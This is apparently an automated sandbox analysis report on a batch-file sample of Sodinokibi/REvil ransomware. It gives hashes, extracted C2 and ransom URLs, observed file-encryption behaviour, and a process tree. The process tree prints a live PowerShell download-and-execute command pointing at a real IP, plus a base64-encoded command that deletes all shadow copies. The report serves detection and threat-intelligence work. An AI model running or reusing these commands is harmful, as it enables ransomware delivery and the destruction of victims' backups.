Analysis
-
max time kernel
58s -
max time network
77s -
platform
windows7_x64 -
resource
win7 -
submitted
19-08-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
398e244bda5a94afa8c2c988f37b2cd6.bat
Resource
win7
Behavioral task
behavioral2
Sample
398e244bda5a94afa8c2c988f37b2cd6.bat
Resource
win10
General
-
Target
398e244bda5a94afa8c2c988f37b2cd6.bat
-
Size
215B
-
MD5
3e3fadb01dd3a604d3d369bc51bb3a6f
-
SHA1
6afb2f7dbd13b3f1aa3b86fda6dd1e44b513f195
-
SHA256
dfb5ad14ea6a191cabe5996c4433e3a6b707fb4e5f571a7e6bbc53d6593ee1a7
-
SHA512
100b892215e1896a9b372d21fa4769da6cc7698703cc779f2674dc585d3b03633e7f30aae9fdb4011816db41a775b33fe0853d766c308f3af863c1aa82a1c464
Malware Config
Extracted
http://185.103.242.78/pastes/398e244bda5a94afa8c2c988f37b2cd6
Extracted
C:\x04r1y-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8519576D4C181A85
http://decryptor.cc/8519576D4C181A85
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 296 powershell.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\PushDeny.crw => \??\c:\users\admin\pictures\PushDeny.crw.x04r1y powershell.exe File renamed C:\Users\Admin\Pictures\RestartReset.crw => \??\c:\users\admin\pictures\RestartReset.crw.x04r1y powershell.exe File renamed C:\Users\Admin\Pictures\AssertDisable.tif => \??\c:\users\admin\pictures\AssertDisable.tif.x04r1y powershell.exe File renamed C:\Users\Admin\Pictures\DenyJoin.tif => \??\c:\users\admin\pictures\DenyJoin.tif.x04r1y powershell.exe File renamed C:\Users\Admin\Pictures\DisconnectEdit.raw => \??\c:\users\admin\pictures\DisconnectEdit.raw.x04r1y powershell.exe File renamed C:\Users\Admin\Pictures\InstallNew.crw => \??\c:\users\admin\pictures\InstallNew.crw.x04r1y powershell.exe File renamed C:\Users\Admin\Pictures\InvokeMeasure.tif => \??\c:\users\admin\pictures\InvokeMeasure.tif.x04r1y powershell.exe File opened for modification \??\c:\users\admin\pictures\DismountEdit.tiff powershell.exe File renamed C:\Users\Admin\Pictures\DismountEdit.tiff => \??\c:\users\admin\pictures\DismountEdit.tiff.x04r1y powershell.exe File renamed C:\Users\Admin\Pictures\OutComplete.tif => \??\c:\users\admin\pictures\OutComplete.tif.x04r1y powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2f3rn7jil0t3.bmp" powershell.exe -
Drops file in Program Files directory 19 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\CompleteConvertFrom.xlsx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\x04r1y-readme.txt powershell.exe File created \??\c:\program files (x86)\x04r1y-readme.txt powershell.exe File opened for modification \??\c:\program files\LimitMeasure.pcx powershell.exe File opened for modification \??\c:\program files\RedoConvert.xht powershell.exe File opened for modification \??\c:\program files\RemoveExpand.gif powershell.exe File opened for modification \??\c:\program files\ShowInstall.eps powershell.exe File opened for modification \??\c:\program files\SkipConfirm.mpeg powershell.exe File opened for modification \??\c:\program files\UpdateSuspend.gif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\x04r1y-readme.txt powershell.exe File created \??\c:\program files\x04r1y-readme.txt powershell.exe File opened for modification \??\c:\program files\FindSelect.contact powershell.exe File opened for modification \??\c:\program files\InstallShow.mpp powershell.exe File opened for modification \??\c:\program files\JoinRegister.vssx powershell.exe File opened for modification \??\c:\program files\ResizeConnect.TTS powershell.exe File opened for modification \??\c:\program files\TraceRegister.wmf powershell.exe File opened for modification \??\c:\program files\ExpandProtect.dib powershell.exe File opened for modification \??\c:\program files\UndoUpdate.vsdm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\x04r1y-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 296 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 296 powershell.exe 296 powershell.exe 296 powershell.exe 1236 powershell.exe 1236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 296 powershell.exe Token: SeDebugPrivilege 296 powershell.exe Token: SeDebugPrivilege 1236 powershell.exe Token: SeBackupPrivilege 1976 vssvc.exe Token: SeRestorePrivilege 1976 vssvc.exe Token: SeAuditPrivilege 1976 vssvc.exe Token: SeTakeOwnershipPrivilege 296 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1456 wrote to memory of 296 1456 cmd.exe powershell.exe PID 1456 wrote to memory of 296 1456 cmd.exe powershell.exe PID 1456 wrote to memory of 296 1456 cmd.exe powershell.exe PID 1456 wrote to memory of 296 1456 cmd.exe powershell.exe PID 296 wrote to memory of 1236 296 powershell.exe powershell.exe PID 296 wrote to memory of 1236 296 powershell.exe powershell.exe PID 296 wrote to memory of 1236 296 powershell.exe powershell.exe PID 296 wrote to memory of 1236 296 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\398e244bda5a94afa8c2c988f37b2cd6.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/398e244bda5a94afa8c2c988f37b2cd6');Invoke-DLBAJCKU;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1976